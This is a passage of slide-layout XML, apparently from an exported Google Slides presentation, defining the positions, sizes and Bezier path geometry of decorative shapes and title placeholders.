                    <a:cubicBezTo>
                      <a:pt x="488" y="852"/>
                      <a:pt x="542" y="835"/>
                      <a:pt x="591" y="806"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="591" y="806"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="601" y="814"/>
                      <a:pt x="613" y="819"/>
                      <a:pt x="626" y="819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="870" y="749"/>
                      <a:pt x="940" y="435"/>
                      <a:pt x="801" y="227"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="732" y="92"/>
                      <a:pt x="607" y="1"/>
                      <a:pt x="47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9" name="Google Shape;2469;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11998771" y="1047386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0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="0"/>
                      <a:pt x="0" y="70"/>
                      <a:pt x="0" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="312"/>
                      <a:pt x="70" y="417"/>
                      <a:pt x="209" y="417"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="417"/>
                      <a:pt x="417" y="312"/>
                      <a:pt x="417" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="70"/>
                      <a:pt x="314" y="0"/>
                      <a:pt x="20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0" name="Google Shape;2470;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10706378" y="897737"/>
                <a:ext cx="35341" cy="35341"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="418" w="418">
                    <a:moveTo>
                      <a:pt x="209" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="1"/>
                      <a:pt x="1" y="106"/>
                      <a:pt x="1" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="315"/>
                      <a:pt x="70" y="418"/>
                      <a:pt x="209" y="418"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="315" y="418"/>
                      <a:pt x="418" y="315"/>
                      <a:pt x="418" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="106"/>
                      <a:pt x="315" y="1"/>
                      <a:pt x="209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1" name="Google Shape;2471;p74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12377798" y="1239985"/>
                <a:ext cx="43965" cy="41006"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="485" w="520">
                    <a:moveTo>
                      <a:pt x="284" y="73"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="346" y="73"/>
                      <a:pt x="390" y="104"/>
                      <a:pt x="417" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="450" y="191"/>
                      <a:pt x="450" y="225"/>
                      <a:pt x="450" y="294"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="430" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="315"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="428" y="315"/>
                      <a:pt x="427" y="314"/>
                      <a:pt x="426" y="314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="421" y="314"/>
                      <a:pt x="417" y="318"/>
                      <a:pt x="417" y="329"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="417" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="400"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="341" y="406"/>
                      <a:pt x="337" y="411"/>
                      <a:pt x="335" y="417"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="335" y="417"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="318" y="424"/>
                      <a:pt x="301" y="427"/>
                      <a:pt x="284" y="427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="243" y="427"/>
                      <a:pt x="201" y="408"/>
                      <a:pt x="172" y="364"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="294"/>
                      <a:pt x="139" y="155"/>
                      <a:pt x="208" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="77"/>
                      <a:pt x="261" y="73"/>
                      <a:pt x="284" y="73"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="291" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="250" y="0"/>
                      <a:pt x="209" y="16"/>
                      <a:pt x="172" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="122"/>
                      <a:pt x="0" y="294"/>
                      <a:pt x="139" y="433"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="469"/>
                      <a:pt x="212" y="484"/>
                      <a:pt x="251" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="283" y="484"/>
                      <a:pt x="315" y="474"/>
                      <a:pt x="344" y="455"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="344" y="455"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="354" y="464"/>
                      <a:pt x="367" y="469"/>
                      <a:pt x="381" y="469"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="520" y="433"/>
                      <a:pt x="520" y="225"/>
                      <a:pt x="486" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="441" y="53"/>
                      <a:pt x="367" y="0"/>
                      <a:pt x="291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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11390875" y="3870173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3" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="1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3" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="209"/>
                      <a:pt x="209" y="139"/>
                      <a:pt x="209" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="37"/>
                      <a:pt x="173" y="1"/>
                      <a:pt x="103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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11928258" y="4263742"/>
                <a:ext cx="17670" cy="17670"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="209" w="209">
                    <a:moveTo>
                      <a:pt x="106" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="0"/>
                      <a:pt x="0" y="37"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="139"/>
                      <a:pt x="70" y="209"/>
                      <a:pt x="106" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="209"/>
                      <a:pt x="209" y="139"/>
                      <a:pt x="209" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="37"/>
                      <a:pt x="176" y="0"/>
                      <a:pt x="106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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11658045" y="3846669"/>
                <a:ext cx="26632" cy="29423"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="348" w="315">
                    <a:moveTo>
                      <a:pt x="139" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="0"/>
                      <a:pt x="0" y="70"/>
                      <a:pt x="0" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="245"/>
                      <a:pt x="70" y="348"/>
                      <a:pt x="139" y="348"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="245" y="348"/>
                      <a:pt x="314" y="245"/>
                      <a:pt x="314" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="70"/>
                      <a:pt x="245" y="0"/>
                      <a:pt x="139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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11393665" y="4251990"/>
                <a:ext cx="29507" cy="26379"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="312" w="349">
                    <a:moveTo>
                      <a:pt x="176" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="1"/>
                      <a:pt x="1" y="70"/>
                      <a:pt x="1" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="242"/>
                      <a:pt x="106" y="312"/>
                      <a:pt x="176" y="312"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279" y="312"/>
                      <a:pt x="348" y="242"/>
                      <a:pt x="348" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="70"/>
                      <a:pt x="279" y="1"/>
                      <a:pt x="176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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11655255" y="3757049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51" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="314" y="62"/>
                      <a:pt x="388" y="119"/>
                      <a:pt x="417" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="211"/>
                      <a:pt x="450" y="245"/>
                      <a:pt x="417" y="281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="302"/>
                      <a:pt x="414" y="319"/>
                      <a:pt x="408" y="335"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="408" y="335"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="380" y="390"/>
                      <a:pt x="321" y="420"/>
                      <a:pt x="265" y="420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="231" y="420"/>
                      <a:pt x="197" y="408"/>
                      <a:pt x="172" y="384"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="281"/>
                      <a:pt x="139" y="142"/>
                      <a:pt x="209" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="65"/>
                      <a:pt x="236" y="62"/>
                      <a:pt x="251" y="62"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="290" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="251" y="0"/>
                      <a:pt x="210" y="12"/>
                      <a:pt x="172" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="142"/>
                      <a:pt x="0" y="314"/>
                      <a:pt x="139" y="420"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="455"/>
                      <a:pt x="215" y="470"/>
                      <a:pt x="255" y="470"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="285" y="470"/>
                      <a:pt x="314" y="462"/>
                      <a:pt x="342" y="448"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="342" y="448"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="345" y="451"/>
                      <a:pt x="347" y="453"/>
                      <a:pt x="347" y="453"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="520" y="420"/>
                      <a:pt x="520" y="245"/>
                      <a:pt x="450" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="429" y="39"/>
                      <a:pt x="363" y="0"/>
                      <a:pt x="290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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10809357" y="4417957"/>
                <a:ext cx="43965" cy="39822"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="471" w="520">
                    <a:moveTo>
                      <a:pt x="245" y="63"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="63"/>
                      <a:pt x="353" y="120"/>
                      <a:pt x="381" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="417" y="210"/>
                      <a:pt x="417" y="247"/>
                      <a:pt x="417" y="280"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="295"/>
                      <a:pt x="402" y="306"/>
                      <a:pt x="394" y="316"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="381" y="316"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="377" y="327"/>
                      <a:pt x="372" y="338"/>
                      <a:pt x="366" y="347"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="366" y="347"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="355" y="358"/>
                      <a:pt x="344" y="369"/>
                      <a:pt x="333" y="384"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="333" y="384"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="309" y="403"/>
                      <a:pt x="280" y="413"/>
                      <a:pt x="250" y="413"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="413"/>
                      <a:pt x="168" y="394"/>
                      <a:pt x="139" y="349"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="280"/>
                      <a:pt x="103" y="141"/>
                      <a:pt x="208" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="66"/>
                      <a:pt x="233" y="63"/>
                      <a:pt x="245" y="63"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="258" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="217" y="0"/>
                      <a:pt x="176" y="12"/>
                      <a:pt x="139" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="141"/>
                      <a:pt x="0" y="316"/>
                      <a:pt x="103" y="419"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="454"/>
                      <a:pt x="177" y="470"/>
                      <a:pt x="217" y="470"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="251" y="470"/>
                      <a:pt x="285" y="458"/>
                      <a:pt x="316" y="437"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="316" y="437"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="320" y="446"/>
                      <a:pt x="329" y="455"/>
                      <a:pt x="347" y="455"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="486" y="419"/>
                      <a:pt x="520" y="210"/>
                      <a:pt x="450" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="406" y="40"/>
                      <a:pt x="332" y="0"/>
                      <a:pt x="258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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="11919550" y="2275354"/>
                <a:ext cx="44049" cy="40498"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="479" w="521">
                    <a:moveTo>
                      <a:pt x="276" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="333" y="69"/>
                      <a:pt x="392" y="118"/>
                      <a:pt x="418" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="203"/>
                      <a:pt x="451" y="236"/>
                      <a:pt x="418" y="273"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="329"/>
                      <a:pt x="393" y="362"/>
                      <a:pt x="366" y="392"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="366" y="392"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="342" y="412"/>
                      <a:pt x="312" y="421"/>
                      <a:pt x="283" y="421"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="242" y="421"/>
                      <a:pt x="202" y="404"/>
                      <a:pt x="173" y="375"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="273"/>
                      <a:pt x="140" y="134"/>
                      <a:pt x="209" y="97"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="77"/>
                      <a:pt x="253" y="69"/>
                      <a:pt x="276" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="267" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="234" y="0"/>
                      <a:pt x="202" y="9"/>
                      <a:pt x="173" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="134"/>
                      <a:pt x="1" y="306"/>
                      <a:pt x="140" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="459"/>
                      <a:pt x="215" y="478"/>
                      <a:pt x="254" y="478"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="287" y="478"/>
                      <a:pt x="321" y="465"/>
                      <a:pt x="351" y="444"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="351" y="444"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="520" y="409"/>
                      <a:pt x="520" y="236"/>
                      <a:pt x="487" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="437" y="57"/>
                      <a:pt x="351" y="0"/>
                      <a:pt x="267" y="0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74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12004605" y="2130778"/>
                <a:ext cx="41259" cy="41090"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="486" w="488">
                    <a:moveTo>
                      <a:pt x="258" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="316" y="69"/>
                      <a:pt x="359" y="118"/>
                      <a:pt x="384" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="418" y="201"/>
                      <a:pt x="418" y="237"/>
                      <a:pt x="418" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="411" y="285"/>
                      <a:pt x="404" y="297"/>
                      <a:pt x="397" y="309"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="397" y="309"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="390" y="307"/>
                      <a:pt x="384" y="307"/>
                      <a:pt x="384" y="307"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="379" y="326"/>
                      <a:pt x="372" y="342"/>
                      <a:pt x="364" y="356"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="364" y="356"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="351" y="372"/>
                      <a:pt x="339" y="385"/>
                      <a:pt x="327" y="397"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="327" y="397"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="304" y="414"/>
                      <a:pt x="277" y="422"/>
                      <a:pt x="250" y="422"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="209" y="422"/>
                      <a:pt x="168" y="405"/>
                      <a:pt x="140" y="376"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="270"/>
                      <a:pt x="106" y="131"/>
                      <a:pt x="176" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="206" y="78"/>
                      <a:pt x="233" y="69"/>
                      <a:pt x="258" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="234" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="1"/>
                      <a:pt x="169" y="9"/>
                      <a:pt x="140" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="131"/>
                      <a:pt x="1" y="307"/>
                      <a:pt x="106" y="409"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="462"/>
                      <a:pt x="190" y="485"/>
                      <a:pt x="234" y="485"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="264" y="485"/>
                      <a:pt x="293" y="475"/>
                      <a:pt x="321" y="456"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="321" y="456"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="322" y="458"/>
                      <a:pt x="324" y="459"/>
                      <a:pt x="327" y="459"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="332" y="459"/>
                      <a:pt x="338" y="455"/>
                      <a:pt x="348" y="446"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="487" y="409"/>
                      <a:pt x="487" y="237"/>
                      <a:pt x="454" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="404" y="57"/>
                      <a:pt x="318" y="1"/>
                      <a:pt x="234" y="1"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="70CB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80" name="Google Shape;2480;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7178590" y="0"/>
            <a:ext cx="1965410" cy="1314283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1" name="Google Shape;2481;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6873527" y="1007415"/>
            <a:ext cx="3277906" cy="1263056"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2482" name="Google Shape;2482;p7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7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p7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p7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7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p7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p7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7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p7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p7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7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p7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p7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p7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p7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p7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p7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p7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7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7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7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7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7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7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7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7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8" name="Google Shape;2508;p74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2509" name="Google Shape;2509;p74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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74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5" name="Google Shape;253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2"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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134400" y="2871000"/>
            <a:ext cx="28752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38" name="Google Shape;2538;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231050" y="1809525"/>
            <a:ext cx="66819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2539" name="Google Shape;2539;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2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75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1" name="Google Shape;2541;p75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2" name="Google Shape;2542;p75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543" name="Google Shape;2543;p75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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75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7" name="Google Shape;2597;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="5287722" y="1942450"/>
            <a:ext cx="3853412" cy="3206993"/>
            <a:chOff x="-13316" y="1942450"/>
            <a:chExt cx="3853412" cy="3206993"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2598" name="Google Shape;2598;p75"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="-784725" y="2727175"/>
              <a:ext cx="3189300" cy="1619850"/>
              <a:chOff x="4185675" y="845125"/>
              <a:chExt cx="3189300" cy="1619850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2599" name="Google Shape;2599;p75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4185675" y="845125"/>
                <a:ext cx="3189300" cy="1619850"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="64794" w="127572">
                    <a:moveTo>
                      <a:pt x="113336" y="23816"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="113349" y="23816"/>
                      <a:pt x="113375" y="23828"/>
                      <a:pt x="113414" y="23864"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113336" y="23864"/>
                      <a:pt x="113311" y="23816"/>
                      <a:pt x="113336" y="23816"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11578" y="3144"/>
                      <a:pt x="24234" y="3902"/>
                      <a:pt x="36229" y="3902"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39143" y="3902"/>
                      <a:pt x="42018" y="3858"/>
                      <a:pt x="44829" y="3791"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47556" y="3735"/>
                      <a:pt x="50348" y="3599"/>
                      <a:pt x="53102" y="3599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61161" y="3599"/>
                      <a:pt x="68895" y="4764"/>
                      <a:pt x="73715" y="12489"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78060" y="19403"/>
                      <a:pt x="81967" y="26433"/>
                      <a:pt x="90772" y="28101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98694" y="29662"/>
                      <a:pt x="106054" y="27325"/>
                      <a:pt x="111184" y="35354"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113075" y="38360"/>
                      <a:pt x="113744" y="41822"/>
                      <a:pt x="114413" y="45274"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115421" y="50520"/>
                      <a:pt x="117651" y="54864"/>
                      <a:pt x="120997" y="58995"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123004" y="61225"/>
                      <a:pt x="125234" y="63232"/>
                      <a:pt x="127571" y="64793"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="127571" y="52527"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="125787" y="51073"/>
                      <a:pt x="124226" y="49405"/>
                      <a:pt x="122888" y="47505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120328" y="43606"/>
                      <a:pt x="118650" y="39146"/>
                      <a:pt x="117981" y="34569"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117428" y="30555"/>
                      <a:pt x="117535" y="25871"/>
                      <a:pt x="113414" y="23864"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="113414" y="23864"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="116643" y="25095"/>
                      <a:pt x="117874" y="28324"/>
                      <a:pt x="118650" y="31447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119766" y="35907"/>
                      <a:pt x="120774" y="40484"/>
                      <a:pt x="123111" y="44382"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124342" y="46505"/>
                      <a:pt x="125787" y="48397"/>
                      <a:pt x="127571" y="50074"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="127571" y="0"/>
                    </a:lnTo>
